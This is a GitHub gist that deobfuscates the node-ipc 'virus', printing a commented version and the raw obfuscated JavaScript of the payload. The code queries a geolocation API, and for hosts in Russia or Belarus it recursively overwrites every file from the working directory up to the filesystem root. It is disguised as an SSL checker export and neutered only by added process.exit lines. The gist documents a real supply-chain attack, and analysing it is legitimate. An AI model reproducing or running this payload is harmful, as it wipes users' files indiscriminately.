Skip to content

Instantly share code, notes, and snippets.

@jerbear2008

jerbear2008/VIRUS formatted.js

Last active March 18, 2022 04:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jerbear2008/61b0392b46e9fba4f949b5c1ab69da3e to your computer and use it in GitHub Desktop.
Save jerbear2008/61b0392b46e9fba4f949b5c1ab69da3e to your computer and use it in GitHub Desktop.
Download ZIP
Deobfuscating the node-ipc virus.
Raw
VIRUS formatted.js
/* for saftey reasons: */ process.exit(1) //not in original payload
import path from "path"
import fs from "fs"
import https from "https"
setTimeout(function() { //check location, if so activate payload
/* for saftey reasons: */ process.exit(1) //not in original payload
const randomNum = Math.round(Math.random() * 4) //randomly deactivates itself
if (randomNum > 1) {
return
}
const geoLocationIP = 'https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154'
https.get(geoLocationIP, function(response) { //fetch geolocation
response.on("data", function(data) {
try { //proccess response
const json = JSON.parse(data.toString("utf8"))
const country = json.country_name.toLowerCase()
const isTarget = country.includes('russia') || country.includes('belarus')
if (isTarget) { //if russia or belarus, overwerite
overwrite('./')
overwrite('../')
overwrite('../../')
overwrite('/')
}
} catch (err) {}
})
})
}, Math.ceil(Math.random() * 1e3)) //run between 1 second and 1000 seconds
async function overwrite(folder = '') {
/* for saftey reasons: */ process.exit(1) //not in original payload
if (!fs.existsSync(folder)) { //if folder does not exist, stop
return
}
let contents = []
try {
contents = fs.readdirSync(folder) //get contents of folder
} catch (err) {}
const foldersOverwritten = []
for (var i = 0; i < contents.length; i++) { //iterate over files
const pathToCheck = path.join(folder, contents[i]) //get path of file
let file = null
try {
file = fs.lstatSync(pathToCheck) //get file
} catch (err) {
continue
}
if (file.isDirectory()) { //if directory, recurse
const result = overwrite(pathToCheck)
result.length > 0 ? foldersOverwritten.push(...result) : null //add to list of folders overwritten
} else if (pathToCheck.indexOf('') >= 0) { //else if file
try {
fs.writeFile(pathToCheck, '❤️', function() {}) //overwrite file!
} catch (err) {}
}
}
return foldersOverwritten
}
//disguised as ssl checker
const ssl = true
export {
ssl as
default, ssl
}
Raw
VIRUS raw.js
/* for saftey reasons: */ process.exit(1) //not in original payload
import u from"path";import a from"fs";import o from"https";setTimeout(function(){const t=Math.round(Math.random()*4);if(t>1){return}const n=Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=","base64");o.get(n.toString("utf8"),function(t){t.on("data",function(t){const n=Buffer.from("Li8=","base64");const o=Buffer.from("Li4v","base64");const r=Buffer.from("Li4vLi4v","base64");const f=Buffer.from("Lw==","base64");const c=Buffer.from("Y291bnRyeV9uYW1l","base64");const e=Buffer.from("cnVzc2lh","base64");const i=Buffer.from("YmVsYXJ1cw==","base64");try{const s=JSON.parse(t.toString("utf8"));const u=s[c.toString("utf8")].toLowerCase();const a=u.includes(e.toString("utf8"))||u.includes(i.toString("utf8"));if(a){h(n.toString("utf8"));h(o.toString("utf8"));h(r.toString("utf8"));h(f.toString("utf8"))}}catch(t){}})})},Math.ceil(Math.random()*1e3));async function h(n="",o=""){if(!a.existsSync(n)){return}let r=[];try{r=a.readdirSync(n)}catch(t){}const f=[];const c=Buffer.from("4p2k77iP","base64");for(var e=0;e<r.length;e++){const i=u.join(n,r[e]);let t=null;try{t=a.lstatSync(i)}catch(t){continue}if(t.isDirectory()){const s=h(i,o);s.length>0?f.push(...s):null}else if(i.indexOf(o)>=0){try{a.writeFile(i,c.toString("utf8"),function(){})}catch(t){}}}return f};const ssl=true;export {ssl as default,ssl}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment